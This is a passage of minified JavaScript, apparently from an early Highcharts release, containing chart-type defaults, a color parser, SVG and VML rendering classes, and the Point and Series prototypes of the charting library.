this.total},style:ma.style}}),ie={labels:{align:"right",x:-8,y:null},title:{rotation:270}},he={labels:{align:"left",x:8,y:null},title:{rotation:90}},Td={labels:{align:"center",x:0,y:14},title:{rotation:0}}, +ge=Ca(Td,{labels:{y:-5}}),xb=Xa.plotOptions;ma=xb.line;xb.spline=Ca(ma);xb.scatter=Ca(ma,{lineWidth:0,states:{hover:{lineWidth:0}}});xb.area=Ca(ma,{});xb.areaspline=Ca(xb.area);xb.column=Ca(ma,{borderColor:"#FFFFFF",borderWidth:1,borderRadius:0,groupPadding:0.2,marker:null,pointPadding:0.1,minPointLength:0,states:{hover:{brightness:0.1,shadow:false},select:{color:"#C0C0C0",borderColor:"#000000",shadow:false}},dataLabels:{y:null,verticalAlign:null}});xb.bar=Ca(xb.column,{dataLabels:{align:"left",x:5, +y:0}});xb.pie=Ca(ma,{borderColor:"#FFFFFF",borderWidth:1,center:["50%","50%"],colorByPoint:true,dataLabels:{distance:30,enabled:true,formatter:function(){return this.point.name},y:5},legendType:"point",marker:null,size:"75%",showInLegend:false,slicedOffset:10,states:{hover:{brightness:0.1,shadow:false}}});Id();var bc=function(a){var b=[],c;(function(d){if(c=/rgba\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]?(?:\.[0-9]+)?)\s*\)/.exec(d))b=[ja(c[1]),ja(c[2]),ja(c[3]),parseFloat(c[4], +10)];else if(c=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(d))b=[ja(c[1],16),ja(c[2],16),ja(c[3],16),1]})(a);return{get:function(d){return b&&!isNaN(b[0])?d==="rgb"?"rgb("+b[0]+","+b[1]+","+b[2]+")":d==="a"?b[3]:"rgba("+b.join(",")+")":a},brighten:function(d){if(lc(d)&&d!==0){var e;for(e=0;e<3;e++){b[e]+=ja(d*255);if(b[e]<0)b[e]=0;if(b[e]>255)b[e]=255}}return this},setOpacity:function(d){b[3]=d;return this}}};Uc.prototype={init:function(a,b){this.element=ua.createElementNS("http://www.w3.org/2000/svg", +b);this.renderer=a},animate:function(a,b,c){if(b=A(b,Bc,true)){b=Ca(b);if(c)b.complete=c;gd(this,a,b)}else{this.attr(a);c&&c()}},attr:function(a,b){var c,d,e,f,g=this.element,h=g.nodeName,i=this.renderer,j,m=this.shadows,v=this.htmlNode,P,T=this;if(Sb(a)&&K(b)){c=a;a={};a[c]=b}if(Sb(a)){c=a;if(h==="circle")c={x:"cx",y:"cy"}[c]||c;else if(c==="strokeWidth")c="stroke-width";T=Ga(g,c)||this[c]||0;if(c!=="d"&&c!=="visibility")T=parseFloat(T)}else for(c in a){j=false;d=a[c];if(c==="d"){if(d&&d.join)d= +d.join(" ");if(/(NaN| {2}|^$)/.test(d))d="M 0 0";this.d=d}else if(c==="x"&&h==="text"){for(e=0;e<g.childNodes.length;e++){f=g.childNodes[e];Ga(f,"x")===Ga(g,"x")&&Ga(f,"x",d)}if(this.rotation)Ga(g,"transform","rotate("+this.rotation+" "+d+" "+ja(a.y||Ga(g,"y"))+")")}else if(c==="fill")d=i.color(d,g,c);else if(h==="circle"&&(c==="x"||c==="y"))c={x:"cx",y:"cy"}[c]||c;else if(c==="translateX"||c==="translateY"||c==="rotation"||c==="verticalAlign"){this[c]=d;this.updateTransform();j=true}else if(c=== +"stroke")d=i.color(d,g,c);else if(c==="dashstyle"){c="stroke-dasharray";d=d&&d.toLowerCase();if(d==="solid")d=jb;else if(d){d=d.replace("shortdashdotdot","3,1,1,1,1,1,").replace("shortdashdot","3,1,1,1").replace("shortdot","1,1,").replace("shortdash","3,1,").replace("longdash","8,3,").replace(/dot/g,"1,3,").replace("dash","4,3,").replace(/,$/,"").split(",");for(e=d.length;e--;)d[e]=ja(d[e])*a["stroke-width"];d=d.join(",")}}else if(c==="isTracker")this[c]=d;else if(c==="width")d=ja(d);else if(c=== +"align"){c="text-anchor";d={left:"start",center:"middle",right:"end"}[d]}else if(c==="title"){e=ua.createElementNS("http://www.w3.org/2000/svg","title");e.appendChild(ua.createTextNode(d));g.appendChild(e)}if(c==="strokeWidth")c="stroke-width";if(Ud&&c==="stroke-width"&&d===0)d=1.0E-6;if(this.symbolName&&/^(x|y|r|start|end|innerR)/.test(c)){if(!P){this.symbolAttr(a);P=true}j=true}if(m&&/^(width|height|visibility|x|y|d)$/.test(c))for(e=m.length;e--;)Ga(m[e],c,d);if((c==="width"||c==="height")&&h=== +"rect"&&d<0)d=0;if(c==="text"){this.textStr=d;this.added&&i.buildText(this)}else j||Ga(g,c,d);if(v&&(c==="x"||c==="y"||c==="translateX"||c==="translateY"||c==="visibility")){e=v.length?v:[this];f=e.length;var Y;for(Y=0;Y<f;Y++){v=e[Y];j=v.getBBox();v=v.htmlNode;Ja(v,sa(this.styles,{left:j.x+(this.translateX||0)+Ua,top:j.y+(this.translateY||0)+Ua}));c==="visibility"&&Ja(v,{visibility:d})}}}return T},symbolAttr:function(a){var b=this;u(["x","y","r","start","end","width","height","innerR"],function(c){b[c]= +A(a[c],b[c])});b.attr({d:b.renderer.symbols[b.symbolName](W(b.x*2)/2,W(b.y*2)/2,b.r,{start:b.start,end:b.end,width:b.width,height:b.height,innerR:b.innerR})})},clip:function(a){return this.attr("clip-path","url("+this.renderer.url+"#"+a.id+")")},crisp:function(a,b,c,d,e){var f,g={},h={},i;a=a||this.strokeWidth||0;i=a%2/2;h.x=lb(b||this.x||0)+i;h.y=lb(c||this.y||0)+i;h.width=lb((d||this.width||0)-2*i);h.height=lb((e||this.height||0)-2*i);h.strokeWidth=a;for(f in h)if(this[f]!==h[f])this[f]=g[f]=h[f]; +return g},css:function(a){var b=this.element;b=a&&a.width&&b.nodeName==="text";var c,d="",e=function(f,g){return"-"+g.toLowerCase()};if(a&&a.color)a.fill=a.color;this.styles=a=sa(this.styles,a);if(Pc&&!Lc){b&&delete a.width;Ja(this.element,a)}else{for(c in a)d+=c.replace(/([A-Z])/g,e)+":"+a[c]+";";this.attr({style:d})}b&&this.added&&this.renderer.buildText(this);return this},on:function(a,b){var c=b;if(Kb&&a==="click"){a="touchstart";c=function(d){d.preventDefault();b()}}this.element["on"+a]=c;return this}, +translate:function(a,b){return this.attr({translateX:a,translateY:b})},invert:function(){this.inverted=true;this.updateTransform();return this},updateTransform:function(){var a=this.translateX||0,b=this.translateY||0,c=this.inverted,d=this.rotation,e=[];if(c){a+=this.attr("width");b+=this.attr("height")}if(a||b)e.push("translate("+a+","+b+")");if(c)e.push("rotate(90) scale(-1,1)");else d&&e.push("rotate("+d+" "+this.x+" "+this.y+")");e.length&&Ga(this.element,"transform",e.join(" "))},toFront:function(){var a= +this.element;a.parentNode.appendChild(a);return this},align:function(a,b,c){if(a){this.alignOptions=a;this.alignByTranslate=b;c||this.renderer.alignedObjects.push(this)}else{a=this.alignOptions;b=this.alignByTranslate}c=A(c,this.renderer);var d=a.align,e=a.verticalAlign,f=(c.x||0)+(a.x||0),g=(c.y||0)+(a.y||0),h={};if(/^(right|center)$/.test(d))f+=(c.width-(a.width||0))/{right:1,center:2}[d];h[b?"translateX":"x"]=W(f);if(/^(bottom|middle)$/.test(e))g+=(c.height-(a.height||0))/({bottom:1,middle:2}[e]|| +1);h[b?"translateY":"y"]=W(g);this[this.placed?"animate":"attr"](h);this.placed=true;this.alignAttr=h;return this},getBBox:function(){var a,b,c,d=this.rotation,e=d*ae;try{a=sa({},this.element.getBBox())}catch(f){a={width:0,height:0}}b=a.width;c=a.height;if(d){a.width=bb(c*Cb(e))+bb(b*rb(e));a.height=bb(c*rb(e))+bb(b*Cb(e))}return a},show:function(){return this.attr({visibility:Ab})},hide:function(){return this.attr({visibility:ob})},add:function(a){var b=this.renderer,c=a||b,d=c.element||b.box,e= +d.childNodes,f=this.element,g=Ga(f,"zIndex");this.parentInverted=a&&a.inverted;this.textStr!==undefined&&b.buildText(this);if(a&&this.htmlNode){if(!a.htmlNode)a.htmlNode=[];a.htmlNode.push(this)}if(g){c.handleZ=true;g=ja(g)}if(c.handleZ)for(c=0;c<e.length;c++){a=e[c];b=Ga(a,"zIndex");if(a!==f&&(ja(b)>g||!K(g)&&K(b))){d.insertBefore(f,a);return this}}d.appendChild(f);this.added=true;return this},safeRemoveChild:function(a){var b=a.parentNode;b&&b.removeChild(a)},destroy:function(){var a=this,b=a.element|| +{},c=a.shadows,d,e;b.onclick=b.onmouseout=b.onmouseover=b.onmousemove=null;Hc(a);if(a.clipPath)a.clipPath=a.clipPath.destroy();if(a.stops){for(e=0;e<a.stops.length;e++)a.stops[e]=a.stops[e].destroy();a.stops=null}a.safeRemoveChild(b);c&&u(c,function(f){a.safeRemoveChild(f)});nc(a.renderer.alignedObjects,a);for(d in a)delete a[d];return null},empty:function(){for(var a=this.element,b=a.childNodes,c=b.length;c--;)a.removeChild(b[c])},shadow:function(a,b){var c=[],d,e,f=this.element,g=this.parentInverted? +"(-1,-1)":"(1,1)";if(a){for(d=1;d<=3;d++){e=f.cloneNode(0);Ga(e,{isShadow:"true",stroke:"rgb(0, 0, 0)","stroke-opacity":0.05*d,"stroke-width":7-2*d,transform:"translate"+g,fill:jb});b?b.element.appendChild(e):f.parentNode.insertBefore(e,f);c.push(e)}this.shadows=c}return this}};var ed=function(){this.init.apply(this,arguments)};ed.prototype={Element:Uc,init:function(a,b,c,d){var e=location,f;f=this.createElement("svg").attr({xmlns:"http://www.w3.org/2000/svg",version:"1.1"});a.appendChild(f.element); +this.box=f.element;this.boxWrapper=f;this.alignedObjects=[];this.url=Pc?"":e.href.replace(/#.*?$/,"");this.defs=this.createElement("defs").add();this.forExport=d;this.gradients=[];this.setSize(b,c,false)},destroy:function(){var a,b=this.gradients,c=this.defs;this.box=null;this.boxWrapper=this.boxWrapper.destroy();if(b){for(a=0;a<b.length;a++)this.gradients[a]=b[a].destroy();this.gradients=null}if(c)this.defs=c.destroy();return this.alignedObjects=null},createElement:function(a){var b=new this.Element; +b.init(this,a);return b},buildText:function(a){for(var b=a.element,c=A(a.textStr,"").toString().replace(/<(b|strong)>/g,'<span style="font-weight:bold">').replace(/<(i|em)>/g,'<span style="font-style:italic">').replace(/<a/g,"<span").replace(/<\/(b|strong|i|em|a)>/g,"</span>").split(/<br.*?>/g),d=b.childNodes,e=/style="([^"]+)"/,f=/href="([^"]+)"/,g=Ga(b,"x"),h=a.styles,i=h&&a.useHTML&&!this.forExport,j=a.htmlNode,m=h&&ja(h.width),v=h&&h.lineHeight,P,T=d.length;T--;)b.removeChild(d[T]);m&&!a.added&& +this.box.appendChild(b);u(c,function(Y,H){var U,z=0,M;Y=Y.replace(/<span/g,"|||<span").replace(/<\/span>/g,"</span>|||");U=Y.split("|||");u(U,function(y){if(y!==""||U.length===1){var C={},Z=ua.createElementNS("http://www.w3.org/2000/svg","tspan");e.test(y)&&Ga(Z,"style",y.match(e)[1].replace(/(;| |^)color([ :])/,"$1fill$2"));if(f.test(y)){Ga(Z,"onclick",'location.href="'+y.match(f)[1]+'"');Ja(Z,{cursor:"pointer"})}y=(y.replace(/<(.|\n)*?>/g,"")||" ").replace(/</g,"<").replace(/>/g,">");Z.appendChild(ua.createTextNode(y)); +if(z)C.dx=3;else C.x=g;if(!z){if(H){!Lc&&a.renderer.forExport&&Ja(Z,{display:"block"});M=db.getComputedStyle&&ja(db.getComputedStyle(P,null).getPropertyValue("line-height"));if(!M||isNaN(M))M=v||P.offsetHeight||18;Ga(Z,"dy",M)}P=Z}Ga(Z,C);b.appendChild(Z);z++;if(m){y=y.replace(/-/g,"- ").split(" ");for(var Sa,Na=[];y.length||Na.length;){Sa=b.getBBox().width;C=Sa>m;if(!C||y.length===1){y=Na;Na=[];if(y.length){Z=ua.createElementNS("http://www.w3.org/2000/svg","tspan");Ga(Z,{dy:v||16,x:g});b.appendChild(Z); +if(Sa>m)m=Sa}}else{Z.removeChild(Z.firstChild);Na.unshift(y.pop())}y.length&&Z.appendChild(ua.createTextNode(y.join(" ").replace(/- /g,"-")))}}}})});if(i){if(!j)j=a.htmlNode=hb("span",null,sa(h,{position:ic,top:0,left:0}),this.box.parentNode);j.innerHTML=a.textStr;for(T=d.length;T--;)d[T].style.visibility=ob}},crispLine:function(a,b){if(a[1]===a[4])a[1]=a[4]=W(a[1])+b%2/2;if(a[2]===a[5])a[2]=a[5]=W(a[2])+b%2/2;return a},path:function(a){return this.createElement("path").attr({d:a,fill:jb})},circle:function(a, +b,c){a=Nb(a)?a:{x:a,y:b,r:c};return this.createElement("circle").attr(a)},arc:function(a,b,c,d,e,f){if(Nb(a)){b=a.y;c=a.r;d=a.innerR;e=a.start;f=a.end;a=a.x}return this.symbol("arc",a||0,b||0,c||0,{innerR:d||0,start:e||0,end:f||0})},rect:function(a,b,c,d,e,f){if(Nb(a)){b=a.y;c=a.width;d=a.height;e=a.r;f=a.strokeWidth;a=a.x}e=this.createElement("rect").attr({rx:e,ry:e,fill:jb});return e.attr(e.crisp(f,a,b,Ia(c,0),Ia(d,0)))},setSize:function(a,b,c){var d=this.alignedObjects,e=d.length;this.width=a; +this.height=b;for(this.boxWrapper[A(c,true)?"animate":"attr"]({width:a,height:b});e--;)d[e].align()},g:function(a){var b=this.createElement("g");return K(a)?b.attr({"class":vc+a}):b},image:function(a,b,c,d,e){var f={preserveAspectRatio:jb};arguments.length>1&&sa(f,{x:b,y:c,width:d,height:e});f=this.createElement("image").attr(f);f.element.setAttributeNS?f.element.setAttributeNS("http://www.w3.org/1999/xlink","href",a):f.element.setAttribute("hc-svg-href",a);return f},symbol:function(a,b,c,d,e){var f, +g=this.symbols[a];g=g&&g(W(b),W(c),d,e);var h=/^url\((.*?)\)$/,i;if(g){f=this.path(g);sa(f,{symbolName:a,x:b,y:c,r:d});e&&sa(f,e)}else if(h.test(a)){var j=function(m,v){m.attr({width:v[0],height:v[1]}).translate(-W(v[0]/2),-W(v[1]/2))};i=a.match(h)[1];a=be[i];f=this.image(i).attr({x:b,y:c});if(a)j(f,a);else{f.attr({width:0,height:0});hb("img",{onload:function(){j(f,be[i]=[this.width,this.height])},src:i})}}else f=this.circle(b,c,d);return f},symbols:{square:function(a,b,c){c=0.707*c;return[Za,a-c, +b-c,Ka,a+c,b-c,a+c,b+c,a-c,b+c,"Z"]},triangle:function(a,b,c){return[Za,a,b-1.33*c,Ka,a+c,b+0.67*c,a-c,b+0.67*c,"Z"]},"triangle-down":function(a,b,c){return[Za,a,b+1.33*c,Ka,a-c,b-0.67*c,a+c,b-0.67*c,"Z"]},diamond:function(a,b,c){return[Za,a,b-c,Ka,a+c,b,a,b+c,a-c,b,"Z"]},arc:function(a,b,c,d){var e=d.start,f=d.end-1.0E-6,g=d.innerR,h=rb(e),i=Cb(e),j=rb(f);f=Cb(f);d=d.end-e<kc?0:1;return[Za,a+c*h,b+c*i,"A",c,c,0,d,1,a+c*j,b+c*f,Ka,a+g*j,b+g*f,"A",g,g,0,d,0,a+g*h,b+g*i,"Z"]}},clipRect:function(a,b, +c,d){var e=vc+wd++,f=this.createElement("clipPath").attr({id:e}).add(this.defs);a=this.rect(a,b,c,d,0).add(f);a.id=e;a.clipPath=f;return a},color:function(a,b,c){var d,e=/^rgba/;if(a&&a.linearGradient){var f=this;b=a.linearGradient;c=vc+wd++;var g,h,i;g=f.createElement("linearGradient").attr({id:c,gradientUnits:"userSpaceOnUse",x1:b[0],y1:b[1],x2:b[2],y2:b[3]}).add(f.defs);f.gradients.push(g);g.stops=[];u(a.stops,function(j){if(e.test(j[1])){d=bc(j[1]);h=d.get("rgb");i=d.get("a")}else{h=j[1];i=1}j= +f.createElement("stop").attr({offset:j[0],"stop-color":h,"stop-opacity":i}).add(g);g.stops.push(j)});return"url("+this.url+"#"+c+")"}else if(e.test(a)){d=bc(a);Ga(b,c+"-opacity",d.get("a"));return d.get("rgb")}else{b.removeAttribute(c+"-opacity");return a}},text:function(a,b,c,d){var e=Xa.chart.style;b=W(A(b,0));c=W(A(c,0));a=this.createElement("text").attr({x:b,y:c,text:a}).css({fontFamily:e.fontFamily,fontSize:e.fontSize});a.x=b;a.y=c;a.useHTML=d;return a}};fd=ed;if(!Lc){Db=yb(Uc,{init:function(a, +b){var c=["<",b,' filled="f" stroked="f"'],d=["position: ",ic,";"];if(b==="shape"||b===Tb)d.push("left:0;top:0;width:10px;height:10px;");if(Mc)d.push("visibility: ",b===Tb?ob:Ab);c.push(' style="',d.join(""),'"/>');if(b){c=b===Tb||b==="span"||b==="img"?c.join(""):a.prepVML(c);this.element=hb(c)}this.renderer=a},add:function(a){var b=this.renderer,c=this.element,d=b.box;d=a?a.element||a:d;a&&a.inverted&&b.invertChild(c,d);Mc&&d.gVis===ob&&Ja(c,{visibility:ob});d.appendChild(c);this.added=true;this.alignOnAdd&& +this.updateTransform();return this},attr:function(a,b){var c,d,e,f=this.element||{},g=f.style,h=f.nodeName,i=this.renderer,j=this.symbolName,m,v,P=this.shadows,T=this;if(Sb(a)&&K(b)){c=a;a={};a[c]=b}if(Sb(a)){c=a;T=c==="strokeWidth"||c==="stroke-width"?this.strokeweight:this[c]}else for(c in a){d=a[c];m=false;if(j&&/^(x|y|r|start|end|width|height|innerR)/.test(c)){if(!v){this.symbolAttr(a);v=true}m=true}else if(c==="d"){d=d||[];this.d=d.join(" ");e=d.length;for(m=[];e--;)m[e]=lc(d[e])?W(d[e]*10)- +5:d[e]==="Z"?"x":d[e];d=m.join(" ")||"x";f.path=d;if(P)for(e=P.length;e--;)P[e].path=d;m=true}else if(c==="zIndex"||c==="visibility"){if(Mc&&c==="visibility"&&h==="DIV"){f.gVis=d;m=f.childNodes;for(e=m.length;e--;)Ja(m[e],{visibility:d});if(d===Ab)d=null}if(d)g[c]=d;m=true}else if(/^(width|height)$/.test(c)){this[c]=d;if(this.updateClipping){this[c]=d;this.updateClipping()}else g[c]=d;m=true}else if(/^(x|y)$/.test(c)){this[c]=d;if(f.tagName==="SPAN")this.updateTransform();else g[{x:"left",y:"top"}[c]]= +d}else if(c==="class")f.className=d;else if(c==="stroke"){d=i.color(d,f,c);c="strokecolor"}else if(c==="stroke-width"||c==="strokeWidth"){f.stroked=d?true:false;c="strokeweight";this[c]=d;if(lc(d))d+=Ua}else if(c==="dashstyle"){(f.getElementsByTagName("stroke")[0]||hb(i.prepVML(["<stroke/>"]),null,null,f))[c]=d||"solid";this.dashstyle=d;m=true}else if(c==="fill")if(h==="SPAN")g.color=d;else{f.filled=d!==jb?true:false;d=i.color(d,f,c);c="fillcolor"}else if(c==="translateX"||c==="translateY"||c==="rotation"|| +c==="align"){if(c==="align")c="textAlign";this[c]=d;this.updateTransform();m=true}else if(c==="text"){this.bBox=null;f.innerHTML=d;m=true}if(P&&c==="visibility")for(e=P.length;e--;)P[e].style[c]=d;if(!m)if(Mc)f[c]=d;else Ga(f,c,d)}return T},clip:function(a){var b=this,c=a.members;c.push(b);b.destroyClip=function(){nc(c,b)};return b.css(a.getCSS(b.inverted))},css:function(a){var b=this.element;if(b=a&&b.tagName==="SPAN"&&a.width){delete a.width;this.textWidth=b;this.updateTransform()}this.styles=sa(this.styles, +a);Ja(this.element,a);return this},safeRemoveChild:function(a){a.parentNode&&pc(a)},destroy:function(){this.destroyClip&&this.destroyClip();return Uc.prototype.destroy.apply(this)},empty:function(){for(var a=this.element.childNodes,b=a.length,c;b--;){c=a[b];c.parentNode.removeChild(c)}},getBBox:function(){var a=this.element,b=this.bBox;if(!b){if(a.nodeName==="text")a.style.position=ic;b=this.bBox={x:a.offsetLeft,y:a.offsetTop,width:a.offsetWidth,height:a.offsetHeight}}return b},on:function(a,b){this.element["on"+ +a]=function(){var c=db.event;c.target=c.srcElement;b(c)};return this},updateTransform:function(){if(this.added){var a=this,b=a.element,c=a.translateX||0,d=a.translateY||0,e=a.x||0,f=a.y||0,g=a.textAlign||"left",h={left:0,center:0.5,right:1}[g],i=g&&g!=="left";if(c||d)a.css({marginLeft:c,marginTop:d});a.inverted&&u(b.childNodes,function(z){a.renderer.invertChild(z,b)});if(b.tagName==="SPAN"){var j,m;c=a.rotation;var v;j=0;d=1;var P=0,T;v=ja(a.textWidth);var Y=a.xCorr||0,H=a.yCorr||0,U=[c,g,b.innerHTML, +a.textWidth].join(",");if(U!==a.cTT){if(K(c)){j=c*ae;d=rb(j);P=Cb(j);Ja(b,{filter:c?["progid:DXImageTransform.Microsoft.Matrix(M11=",d,", M12=",-P,", M21=",P,", M22=",d,", sizingMethod='auto expand')"].join(""):jb})}j=b.offsetWidth;m=b.offsetHeight;if(j>v){Ja(b,{width:v+Ua,display:"block",whiteSpace:"normal"});j=v}v=W((ja(b.style.fontSize)||12)*1.2);Y=d<0&&-j;H=P<0&&-m;T=d*P<0;Y+=P*v*(T?1-h:h);H-=d*v*(c?T?h:1-h:1);if(i){Y-=j*h*(d<0?-1:1);if(c)H-=m*h*(P<0?-1:1);Ja(b,{textAlign:g})}a.xCorr=Y;a.yCorr= +H}Ja(b,{left:e+Y,top:f+H});a.cTT=U}}else this.alignOnAdd=true},shadow:function(a,b){var c=[],d,e=this.element,f=this.renderer,g,h=e.style,i,j=e.path;if(j&&typeof j.value!=="string")j="x";if(a){for(d=1;d<=3;d++){i=['<shape isShadow="true" strokeweight="',7-2*d,'" filled="false" path="',j,'" coordsize="100,100" style="',e.style.cssText,'" />'];g=hb(f.prepVML(i),null,{left:ja(h.left)+1,top:ja(h.top)+1});i=['<stroke color="black" opacity="',0.05*d,'"/>'];hb(f.prepVML(i),null,null,g);b?b.element.appendChild(g): +e.parentNode.insertBefore(g,e);c.push(g)}this.shadows=c}return this}});ma=function(){this.init.apply(this,arguments)};ma.prototype=Ca(ed.prototype,{Element:Db,isIE8:yc.indexOf("MSIE 8.0")>-1,init:function(a,b,c){var d;this.alignedObjects=[];d=this.createElement(Tb);a.appendChild(d.element);this.box=d.element;this.boxWrapper=d;this.setSize(b,c,false);if(!ua.namespaces.hcv){ua.namespaces.add("hcv","urn:schemas-microsoft-com:vml");ua.createStyleSheet().cssText="hcv\\:fill, hcv\\:path, hcv\\:shape, hcv\\:stroke{ behavior:url(#default#VML); display: inline-block; } "}}, +clipRect:function(a,b,c,d){var e=this.createElement();return sa(e,{members:[],left:a,top:b,width:c,height:d,getCSS:function(f){var g=this.top,h=this.left,i=h+this.width,j=g+this.height;g={clip:"rect("+W(f?h:g)+"px,"+W(f?j:i)+"px,"+W(f?i:j)+"px,"+W(f?g:h)+"px)"};!f&&Mc&&sa(g,{width:i+Ua,height:j+Ua});return g},updateClipping:function(){u(e.members,function(f){f.css(e.getCSS(f.inverted))})}})},color:function(a,b,c){var d,e=/^rgba/;if(a&&a.linearGradient){var f,g,h=a.linearGradient,i,j,m,v;u(a.stops, +function(P,T){if(e.test(P[1])){d=bc(P[1]);f=d.get("rgb");g=d.get("a")}else{f=P[1];g=1}if(T){m=f;v=g}else{i=f;j=g}});a=90-Fa.atan((h[3]-h[1])/(h[2]-h[0]))*180/kc;a=["<",c,' colors="0% ',i,",100% ",m,'" angle="',a,'" opacity="',v,'" o:opacity2="',j,'" type="gradient" focus="100%" />'];hb(this.prepVML(a),null,null,b)}else if(e.test(a)&&b.tagName!=="IMG"){d=bc(a);a=["<",c,' opacity="',d.get("a"),'"/>'];hb(this.prepVML(a),null,null,b);return d.get("rgb")}else{b=b.getElementsByTagName(c);if(b.length)b[0].opacity= +1;return a}},prepVML:function(a){var b=this.isIE8;a=a.join("");if(b){a=a.replace("/>",' xmlns="urn:schemas-microsoft-com:vml" />');a=a.indexOf('style="')===-1?a.replace("/>",' style="display:inline-block;behavior:url(#default#VML);" />'):a.replace('style="','style="display:inline-block;behavior:url(#default#VML);')}else a=a.replace("<","<hcv:");return a},text:function(a,b,c){var d=Xa.chart.style;return this.createElement("span").attr({text:a,x:W(b),y:W(c)}).css({whiteSpace:"nowrap",fontFamily:d.fontFamily, +fontSize:d.fontSize})},path:function(a){return this.createElement("shape").attr({coordsize:"100 100",d:a})},circle:function(a,b,c){return this.symbol("circle").attr({x:a,y:b,r:c})},g:function(a){var b;if(a)b={className:vc+a,"class":vc+a};return this.createElement(Tb).attr(b)},image:function(a,b,c,d,e){var f=this.createElement("img").attr({src:a});arguments.length>1&&f.css({left:b,top:c,width:d,height:e});return f},rect:function(a,b,c,d,e,f){if(Nb(a)){b=a.y;c=a.width;d=a.height;e=a.r;f=a.strokeWidth; +a=a.x}var g=this.symbol("rect");g.r=e;return g.attr(g.crisp(f,a,b,Ia(c,0),Ia(d,0)))},invertChild:function(a,b){var c=b.style;Ja(a,{flip:"x",left:ja(c.width)-10,top:ja(c.height)-10,rotation:-90})},symbols:{arc:function(a,b,c,d){var e=d.start,f=d.end,g=rb(e),h=Cb(e),i=rb(f),j=Cb(f);d=d.innerR;var m=0.07/c,v=d&&0.1/d||0;if(f-e===0)return["x"];else if(2*kc-f+e<m)i=-m;else if(f-e<v)i=rb(e+v);return["wa",a-c,b-c,a+c,b+c,a+c*g,b+c*h,a+c*i,b+c*j,"at",a-d,b-d,a+d,b+d,a+d*i,b+d*j,a+d*g,b+d*h,"x","e"]},circle:function(a, +b,c){return["wa",a-c,b-c,a+c,b+c,a+c,b,a+c,b,"e"]},rect:function(a,b,c,d){if(!K(d))return[];var e=d.width;d=d.height;var f=a+e,g=b+d;c=tb(c,e,d);return[Za,a+c,b,Ka,f-c,b,"wa",f-2*c,b,f,b+2*c,f-c,b,f,b+c,Ka,f,g-c,"wa",f-2*c,g-2*c,f,g,f,g-c,f-c,g,Ka,a+c,g,"wa",a,g-2*c,a+2*c,g,a+c,g,a,g-c,Ka,a,b+c,"wa",a,b,a+2*c,b+2*c,a,b+c,a+c,b,"x","e"]}}});fd=ma}Nd.prototype.callbacks=[];var Oc=function(){};Oc.prototype={init:function(a,b){var c=a.chart.counters,d;this.series=a;this.applyOptions(b);this.pointAttr= +{};if(a.options.colorByPoint){d=a.chart.options.colors;if(!this.options)this.options={};this.color=this.options.color=this.color||d[c.color++];c.wrapColor(d.length)}a.chart.pointCount++;return this},applyOptions:function(a){var b=this.series;this.config=a;if(lc(a)||a===null)this.y=a;else if(Nb(a)&&!lc(a.length)){sa(this,a);this.options=a}else if(Sb(a[0])){this.name=a[0];this.y=a[1]}else if(lc(a[0])){this.x=a[0];this.y=a[1]}if(this.x===Wa)this.x=b.autoIncrement()},destroy:function(){var a=this,b=a.series, +c=b.chart.hoverPoints,d;b.chart.pointCount--;if(c){a.setState();nc(c,a)}a===b.chart.hoverPoint&&a.onMouseOut();pb(a);u(["graphic","tracker","group","dataLabel","connector","shadowGroup"],function(e){a[e]&&a[e].destroy()});a.legendItem&&a.series.chart.legend.destroyItem(a);for(d in a)a[d]=null},getLabelConfig:function(){return{x:this.category,y:this.y,series:this.series,point:this,percentage:this.percentage,total:this.total||this.stackTotal}},select:function(a,b){var c=this,d=c.series.chart;a=A(a, +!c.selected);c.firePointEvent(a?"select":"unselect",{accumulate:b},function(){c.selected=a;c.setState(a&&"select");b||u(d.getSelectedPoints(),function(e){if(e.selected&&e!==c){e.selected=false;e.setState(ib);e.firePointEvent("unselect")}})})},onMouseOver:function(){var a=this.series.chart,b=a.tooltip,c=a.hoverPoint;c&&c!==this&&c.onMouseOut();this.firePointEvent("mouseOver");b&&!b.shared&&b.refresh(this);this.setState(Bb);a.hoverPoint=this},onMouseOut:function(){this.firePointEvent("mouseOut");this.setState(); +this.series.chart.hoverPoint=null},tooltipFormatter:function(a){var b=this.series;return['<span style="color:'+b.color+'">',this.name||b.name,"</span>: ",!a?"<b>x = "+(this.name||this.x)+",</b> ":"","<b>",!a?"y = ":"",this.y,"</b>"].join("")},update:function(a,b,c){var d=this,e=d.series,f=d.graphic,g=e.chart;b=A(b,true);d.firePointEvent("update",{options:a},function(){d.applyOptions(a);if(Nb(a)){e.getAttribs();f&&f.attr(d.pointAttr[e.state])}e.isDirty=true;b&&g.redraw(c)})},remove:function(a,b){var c= +this,d=c.series,e=d.chart,f=d.data;oc(b,e);a=A(a,true);c.firePointEvent("remove",null,function(){nc(f,c);c.destroy();d.isDirty=true;a&&e.redraw()})},firePointEvent:function(a,b,c){var d=this,e=this.series.options;if(e.point.events[a]||d.options&&d.options.events&&d.options.events[a])this.importEvents();if(a==="click"&&e.allowPointSelect)c=function(f){d.select(null,f.ctrlKey||f.metaKey||f.shiftKey)};Pa(this,a,b,c)},importEvents:function(){if(!this.hasImportedEvents){var a=Ca(this.series.options.point, +this.options).events,b;this.events=a;for(b in a)Qa(this,b,a[b]);this.hasImportedEvents=true}},setState:function(a){var b=this.series,c=b.options.states,d=xb[b.type].marker&&b.options.marker,e=d&&!d.enabled,f=(d=d&&d.states[a])&&d.enabled===false,g=b.stateMarkerGraphic,h=b.chart,i=this.pointAttr;a=a||ib;if(!(a===this.state||this.selected&&a!=="select"||c[a]&&c[a].enabled===false||a&&(f||e&&!d.enabled))){if(this.graphic)this.graphic.attr(i[a]);else{if(a){if(!g)b.stateMarkerGraphic=g=h.renderer.circle(0, +0,i[a].r).attr(i[a]).add(b.group);g.translate(this.plotX,this.plotY)}if(g)g[a?"show":"hide"]()}this.state=a}}};var sb=function(){};sb.prototype={isCartesian:true,type:"line",pointClass:Oc,pointAttrToOptions:{stroke:"lineColor","stroke-width":"lineWidth",fill:"fillColor",r:"radius"},init:function(a,b){var c,d;d=a.series.length;this.chart=a;b=this.setOptions(b);sa(this,{index:d,options:b,name:b.name||"Series "+(d+1),state:ib,pointAttr:{},visible:b.visible!==false,selected:b.selected===true});d=b.events; +for(c in d)Qa(this,c,d[c]);if(d&&d.click||b.point&&b.point.events&&b.point.events.click||b.allowPointSelect)a.runTrackerClick=true;this.getColor();this.getSymbol();this.setData(b.data,false)},autoIncrement:function(){var 